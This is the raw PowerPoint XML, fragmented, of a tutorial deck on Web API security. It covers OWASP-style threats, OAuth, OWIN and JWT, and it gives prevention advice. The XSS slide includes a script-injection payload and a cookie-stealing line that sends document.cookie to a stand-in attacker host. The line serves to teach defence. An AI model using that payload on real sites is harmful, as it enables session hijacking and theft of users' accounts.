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9" r:id="rId4"/>
    <p:sldId id="286" r:id="rId5"/>
    <p:sldId id="289" r:id="rId6"/>
    <p:sldId id="296" r:id="rId7"/>
    <p:sldId id="284" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="288" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="317" r:id="rId14"/>
    <p:sldId id="318" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="314" r:id="rId17"/>
    <p:sldId id="315" r:id="rId18"/>
    <p:sldId id="316" r:id="rId19"/>
    <p:sldId id="295" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="298" r:id="rId22"/>
    <p:sldId id="297" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="299" r:id="rId25"/>
    <p:sldId id="300" r:id="rId26"/>
    <p:sldId id="301" r:id="rId27"/>
    <p:sldId id="302" r:id="rId28"/>
    <p:sldId id="304" r:id="rId29"/>
    <p:sldId id="303" r:id="rId30"/>
    <p:sldId id="305" r:id="rId31"/>
    <p:sldId id="313" r:id="rId32"/>
    <p:sldId id="259" r:id="rId33"/>
    <p:sldId id="267" r:id="rId34"/>
    <p:sldId id="266" r:id="rId35"/>
    <p:sldId id="261" r:id="rId36"/>
    <p:sldId id="262" r:id="rId37"/>
    <p:sldId id="263" r:id="rId38"/>
    <p:sldId id="264" r:id="rId39"/>
    <p:sldId id="281" r:id="rId40"/>
    <p:sldId id="308" r:id="rId41"/>
    <p:sldId id="280" r:id="rId42"/>
    <p:sldId id="309" r:id="rId43"/>
    <p:sldId id="268" r:id="rId44"/>
    <p:sldId id="282" r:id="rId45"/>
    <p:sldId id="283" r:id="rId46"/>
    <p:sldId id="269" r:id="rId47"/>
    <p:sldId id="276" r:id="rId48"/>
    <p:sldId id="270" r:id="rId49"/>
    <p:sldId id="271" r:id="rId50"/>
    <p:sldId id="272" r:id="rId51"/>
    <p:sldId id="273" r:id="rId52"/>
    <p:sldId id="274" r:id="rId53"/>
    <p:sldId id="275" r:id="rId54"/>
    <p:sldId id="306" r:id="rId55"/>
    <p:sldId id="307" r:id="rId56"/>
    <p:sldId id="311" r:id="rId57"/>
    <p:sldId id="310" r:id="rId58"/>
    <p:sldId id="312" r:id="rId5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2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ugoijs.com/sugoi-server/parameters-validation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m.sahu@jktech.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vishal.garg@jktech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mple.com/search?query=Ala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By:- Vishal Garg and Shivam Sahu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API SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 4" descr="JKTs Logo - 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6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Broken Authentication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bypass authentication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or inadequate authentication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Solely authenticated users should be given access to the APIs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/tokens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send credentials over connections that are not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reveal session ID in the Web URL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29359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 Sensitive Data Exposure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encryption in transit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unable to properly secure sensitive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E.g.: - User information, credit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 information, session tokens,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passwords etc.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ncryption in transit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exposing sensitive data, you must use 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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8714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Broken Access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or inadequate access control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to gain control of other users accounts, alter access privileges,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change data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 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the URL for deleting the profile pic of a certain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If the application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vulnerable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shows the purchase for some other user whose id is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25675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profile pic of Another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CBD977-6625-4BE7-BD47-033B71CE1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2936599"/>
            <a:ext cx="4183743" cy="16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2F87B5B-CE4A-4B2E-8A4A-3753B612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0" y="3737599"/>
            <a:ext cx="4130398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103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3B06C-E39F-4C86-8E65-0B6B0C37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224454"/>
            <a:ext cx="7524328" cy="1280496"/>
          </a:xfrm>
        </p:spPr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Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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DEEDE86-D5FF-4558-8373-E6B1F1AA7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3417" y="2876550"/>
            <a:ext cx="6066046" cy="1981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E2793E-4C2A-4F47-B352-11A58D8C5B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809750"/>
            <a:ext cx="6912768" cy="3200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Encrypted URL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random generated id’s containing both letter and numbers instead of simple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integers.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Proper Access Control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The user must be authorized for the information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the server provides it.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E38AB19-15DD-4C45-807F-EF6D9BE8B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3417" y="3608232"/>
            <a:ext cx="4130398" cy="25910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0"/>
            <a:ext cx="7524328" cy="8844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threats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590550"/>
            <a:ext cx="6912768" cy="46064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Broken Access Control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277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Parameter Tampering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anipulation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cookies, hidden form fields, or URL query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 success depends on integrity and logic validation mechanism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consequences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XSS, SQL Injection, file inclusion, and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path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disclosure attacks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E.g.:-harmful website, program, instant message, blog or e-mail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URL parameters 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2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secretly altering, intercepting or relaying communications between two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interacting systems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Transport layer encryption (TLS)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both SSL and TLS in your APIs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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Comodo Secure Box :- Secure Box will allow you to create a threat-resistant tunnel to specific websites or portals, protect client applications from outside interference during run-time and to shield entire data repositories from attack.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09750"/>
            <a:ext cx="309562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497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0D23E-3C66-4660-B804-44205D9D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38100"/>
            <a:ext cx="7524328" cy="884466"/>
          </a:xfrm>
        </p:spPr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9887C3-2FA8-489E-AAD9-96194F9C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666750"/>
            <a:ext cx="6912768" cy="5334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Secure Sockets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Layer(SSL)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6D66A1-B814-4F93-94C4-72BC5BA421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00200" y="1123950"/>
            <a:ext cx="6912768" cy="34598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For local testing, you can enable SSL in IIS Express from Visual Studio. In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the Properties window, set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SSL Enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to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. Note the value of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SSL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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; use this URL for testing HTTPS connections.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50702D-2781-4F5E-BC3B-536ED8AB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0" y="2190750"/>
            <a:ext cx="3871295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799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6EA827-C80D-4856-9C45-6DF728C7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57150"/>
            <a:ext cx="7524328" cy="609600"/>
          </a:xfrm>
        </p:spPr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89481-3F23-4256-B610-9A8BB992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666750"/>
            <a:ext cx="7139880" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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following code shows a Web API authentication filter that checks for SSL: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3A54276-5675-4AD6-97F9-7CE061AD7CB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201" y="1170667"/>
            <a:ext cx="6324600" cy="2133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3748FC-50D3-480B-8FE3-8230D958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4005005"/>
            <a:ext cx="5715000" cy="990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A8EA497-EE29-4B01-A5F4-EC6B95DC78B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="3358704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Add this filter to any Web API actions that require SSL:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="74347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52550"/>
            <a:ext cx="2495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3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524000" y="1352550"/>
            <a:ext cx="6912768" cy="29957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Facebook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Twitter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GitHub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666750"/>
            <a:ext cx="5486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Who Uses Token Based Authentication?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threats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Token Based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OWIN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JWT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65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7524328" cy="884466"/>
          </a:xfrm>
        </p:spPr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295400" y="742950"/>
            <a:ext cx="7848600" cy="440055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Server Based Authentication (The Traditional Method)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user logged in information on the server.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The Problems with Server Based Authentication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Sessions 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Every time a user is authenticated, the server will need to create a record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somewhere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on our server. This is usually done in memory and when there are many users authenticating, the overhead on your server increases.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Scalability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As our cloud providers start replicating servers to handle application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load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having vital information in session memory will limit our ability to scale.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CORS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multiple mobile devices, we have to worry about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CORS .T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grab resources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from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another domain (mobile to our API server),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could run into forbidden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requests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CSRF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 Users are susceptible to CSRF attacks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38150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Why Tokens Came Around ?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security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486401" y="1200150"/>
            <a:ext cx="3657600" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1276350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How token based authentication actually works?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first sends a request to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endpoint with an appropriate credential.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If the username/password are correct then the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send a token to the client as a response.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This token contains enough data to identify a particular user and an expiry time.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then uses the token to access the restricted resources in next requests till the token is valid.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Token authentication is a 2 step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User pass his credentials to the Authorization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Server returns security token if credentials are correct.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895350"/>
            <a:ext cx="9144000" cy="4248150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Why We Need token based authentication?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Allows users to stay logged onto a website without the use of cookies.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Security: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Tokens are more secure because they can be used to replace a user's actual credentials.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Scalability of Servers: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The token sent to the server is self contained which holds all the user information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Extensibility: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share permissions with another. E.g.:-linked social accounts to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Facebook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Twitter.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provide selective permissions to third-party applications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Mobile Friendly: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Cookies and browsers like each other, but storing cookies on native platforms (Android,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Windows Phone) is not a trivial task.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Multiple Platforms and Domains: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When our application and service expands, we will need to be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providing access to all sorts of devices and applications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895350"/>
            <a:ext cx="7543800" cy="3657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stands for “Open Authorization”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open standard protocol that provides simple and secure authorization for different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types of applications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simple and safe method for consumers to interact with protected data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providers to give access to users without any exchange of credentials Designed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for use only with HTTP protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"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895350"/>
            <a:ext cx="7543800" cy="3657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flexible, compatible and designed to work with mobile devices and desktop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applications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Provides a method for users to grant third-party access to their resources without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sharing their credentials.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Provides a way to grant limited access in terms of scope and duration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Has support from big players in the industry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4112" y="1104900"/>
            <a:ext cx="58959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–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protocol supports bearer tokens. Once authorized, using bearer token client can request to access resource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Bearer Token?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security token is something that any party in possession of the token (a "bearer") can use to present proof-of-possession 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Protocol defines two types of tokens used in the process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Access Token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are credentials required to access the protected resources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Refresh Token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Refresh tokens are credentials used to obtain access tokens when it becomes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invalid or expires etc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–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666750"/>
            <a:ext cx="7620000" cy="38100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What is Access Token ?</a:t>
            </a:r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is a credential that can be used by an application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can be either an opaque string or a JSON web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inform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that the bearer of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has been authorized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the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API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perform specific actions specified by the scope that has been granted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean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– Grant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Grant is a credential which represents owner’s authorization and used by client to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access owner’s protected resources.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grant_type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URL parameter is required for the /token endpoint, which exchanges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a grant for real tokens. So the OAuth2 server knows what you are sending to it.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so you must specify it with the value password.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grant_type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=password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means that you are sending a username and a password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to the /token endpoint.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– End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Endpoints are the URIs which Client uses to make requests. Protocol supports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following authorization server endpoints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Authorization Endpoint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Endpoint used by client to obtain resource authorization from resource owner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Token Endpoint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Used by client to retrieve access or refresh token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Redirection Endpoint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Authorization server uses the endpoint to redirect after authorization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of security Threats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10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XSS (Cross site scripting)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Access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Tampering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08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real life example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09550"/>
            <a:ext cx="3388995" cy="326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348615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After you provide to Twitter your username and password,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he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browser will redirect you back to LinkedIn, that now, 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without knowing any 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Twitter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 credential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can do something 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Twitter.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just delegated LinkedIn to operate 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Twitter.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1352550"/>
            <a:ext cx="4038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Twitter popup window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tells you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advance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LinkedIn will be able to do with these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authorization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grant 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this list of permissions is the SCOPE).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800600" y="2114550"/>
            <a:ext cx="9906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OWIN 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1664245"/>
            <a:ext cx="7315200" cy="29957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Web Interface for.NET (OWIN) is an open-source specification that describes an abstraction layer between web servers and application components.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defines a standard interface between .NET web servers and web applications.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primary goal of OWIN is to decouple the server and application, encouraging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development of small and focused application.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OWIN security middleware is developed to implement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Protocol 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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="owner-resource-authentication-flow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400" y="1504950"/>
            <a:ext cx="6937439" cy="232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191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467600" cy="326970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following are the principal components of this authentication mode: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Resource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holds the resource and protects the resource from unauthorized access.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Resource owner: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requests the resource base on needs.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Authorization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server that authenticates the resource owner identity and issues the access token to the client.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Client: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is an application that requests access on a resource on behalf of the resource owner.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OWIN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95350"/>
            <a:ext cx="5629275" cy="37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8358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03570" cy="41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19150"/>
            <a:ext cx="57378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.:- Step-1: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Add OWIN Start Up class. [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Startup.Auth.cs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71550"/>
            <a:ext cx="57912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98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7391400" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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.:-Step-2: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Add a class for validating user credentials asking for tokens.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71550"/>
            <a:ext cx="7039008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98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/>
              <a:t>Injection attacks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047750"/>
            <a:ext cx="7522368" cy="3657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ross-site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ffective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 to stop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injection attack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nput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length / range / format and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 an implicit input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parameters validation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by using strong types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 string inputs with regex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appropriate request size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94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garg\Desktop\WEB API SECURITY\OWIN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6013210" cy="12689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garg\Desktop\WEB API SECURITY\OWIN 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0540"/>
            <a:ext cx="6076656" cy="1910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garg\Desktop\WEB API SECURITY\OWIN succes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8950"/>
            <a:ext cx="4860308" cy="19907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564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4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715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620000" cy="3581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JSON Web Token (JWT) is a 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JSON object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that is a safe way to represent a set of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information between two parties.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Powerful token format used in HTTP headers in order to make some endpoint secure.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Its an Open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token is composed of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header,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payload, and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signature.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Simply put, a JWT is just a string with the following format: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4767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it is used?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047750"/>
            <a:ext cx="7543800" cy="3886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Securely transfer information between any two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bodies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Digitally signed – information is verified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Compact –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send via URL,POST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request,HTTP header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Contains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Avoiding query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95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JWT Structure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200150"/>
            <a:ext cx="7315200" cy="3733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algorithm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HMAC SHA256 or RSA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 type of JWT token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Payload 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claims are user details or additional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3525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8" y="1123948"/>
            <a:ext cx="632936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76400" y="46291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header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50"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload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2060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signature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Flow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2017-10-16-19-52-32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76600" y="0"/>
            <a:ext cx="5867400" cy="3867150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="33909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It relies on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signed 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tokens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 which are sent by user to server with each request. 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put all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claims in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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web structure.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 structure using asymmetric key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and encode whole thing in Base64.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validating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signature,issuer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audience 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Steps :-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JWT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752599" y="1276348"/>
            <a:ext cx="5029200" cy="3457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2995737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1. Create the HEADER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header is a JSON object in the following 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495550"/>
            <a:ext cx="23622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typ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>": "JWT",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>alg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>": "HS256" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}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1400" y="2876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24955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is a JWT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657600" y="3257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0200" y="31051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2. Create the PAYLOAD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payload component of the JWT is the data that‘s stored inside the JWT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data is also referred to as the “claims” of the JWT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several different standard claims for the JWT payload, such as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the issuer,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“sub” the subject, and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“exp” the expiration time.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Keep in mind that the size of the data will affect the overall size of the JWT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23431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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>": "b08f86af-35da-48f2-8fab-cef3904660bd"}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 Injection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38150"/>
            <a:ext cx="3777190" cy="2391109"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\vgarg\Desktop\WEB API SECURITY\shivam\sqlinjection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4267200" cy="2343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1100465"/>
            <a:ext cx="373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alicious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SQL code for backend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Hackers enter various SQL commands in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075" y="2952750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Prevention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Stored Procedures. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22070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3. Create the SIGNATURE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signature is computed using the following pseudo code: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1813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xN_h82PHVTCMA9vdoHrcZxH-x5mb11y1537t3rGzcM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266950"/>
            <a:ext cx="6172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HMACSHA256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new HMACSHA256();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 key = Convert.ToBase64String(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hmac.Key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671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Algorithm :- SecurityAlgorithms.HmacSha256Signature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4. Put All Three JWT Components Together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Now that we have created all three components, we can create the JWT.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header.payload.signature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structure of the JWT,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simply need to combine the components, with periods (.) separating them.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724150"/>
            <a:ext cx="64008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// JWT Token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eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VySWQiOiJiMDhmODZhZi0zNWRhLTQ4ZjItOGZhYi1jZWYzOTA0NjYwYmQifQ.-xN_h82PHVTCMA9vdoHrcZxH-x5mb11y1537t3rGzcM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5. Verifying the JWT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JWT-attached API call to the application, can be validated.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matches the JWT signature created by the authentication server.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 signatures match, then that means the JWT is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otherwise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by verifying the JWT, the application adds a layer of trust between itself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and the user.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689248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to create JWT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Step1: Generate Token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76350"/>
            <a:ext cx="6705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689248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to create JWT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Step2: Validate Token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8734"/>
            <a:ext cx="5867400" cy="384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689248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to create JWT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E.g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: - Result :-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33550"/>
            <a:ext cx="6784658" cy="267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724150"/>
            <a:ext cx="4791075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790950"/>
            <a:ext cx="6486144" cy="117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4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3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THANK </a:t>
            </a:r>
            <a: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 !!</a:t>
            </a:r>
            <a:b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90800" y="895350"/>
            <a:ext cx="4626768" cy="3886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Contact :-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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2"/>
              </a:rPr>
              <a:t>vishal.garg@jktech.com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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>shivam.sahu@jktech.com</a:t>
            </a:r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Vishal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Garg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(7011735763)</a:t>
            </a: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Shivam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Sahu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(8178580295)</a:t>
            </a:r>
          </a:p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Reference :- </a:t>
            </a:r>
          </a:p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DotNetBig.Blogspot.com</a:t>
            </a:r>
          </a:p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wazap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2724150"/>
            <a:ext cx="633984" cy="633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 descr="email-2-icon.png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971800" y="1885950"/>
            <a:ext cx="633984" cy="633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4290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XSS?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Cross-Site Scripting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makes the victim’s browser execute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Ways to inject :-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parameters:-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E.g1:-When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type your search query and press submit, the generated URL may look something like this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[Original] : https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example.com/search?query=Alan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[XSS] : https</a:t>
            </a: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://example.com/search?query=&lt;script&gt;alert(1)&lt;/script&gt;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E.g2:-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steal the victim’s cookie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Image().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="http://attackerurl.com/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storecookie?cookie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="+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document.cookie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90825"/>
            <a:ext cx="137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509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Ways to prevent XSS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581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user is validated – But we have disable this.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HTML output is encoded – We have disable this as well.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28788"/>
            <a:ext cx="4333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38425"/>
            <a:ext cx="4581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021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123950"/>
            <a:ext cx="7543800" cy="40195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Cross-Site Request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Forgery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malicious site sends a request to a vulnerable site where the user is currently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logged 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57350"/>
            <a:ext cx="4625721" cy="315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474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prevent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971550"/>
            <a:ext cx="6912768" cy="29957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Anti-Forgery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338262"/>
            <a:ext cx="3000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6375"/>
            <a:ext cx="4476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33612"/>
            <a:ext cx="3381375" cy="271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14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1540</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>524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Custom Design</vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>Web Api Security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      Prevention:- </vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Security threats</vt:lpstr>
      <vt:lpstr>Slide 18</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>What is OAuth?</vt:lpstr>
      <vt:lpstr>Why OAuth?</vt:lpstr>
      <vt:lpstr>Building Blocks of OAuth</vt:lpstr>
      <vt:lpstr>Oauth – Tokens</vt:lpstr>
      <vt:lpstr>Oauth – Tokens</vt:lpstr>
      <vt:lpstr>Oauth – Grant Types</vt:lpstr>
      <vt:lpstr>Oauth – End Points</vt:lpstr>
      <vt:lpstr>Oauth</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr> OWIN </vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN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                  THANK YOU !!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Manish</cp:lastModifiedBy>
  <cp:revision>187</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-01T16:27:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-10T17:02:53Z</dcterms:modified>
</cp:coreProperties>
</file>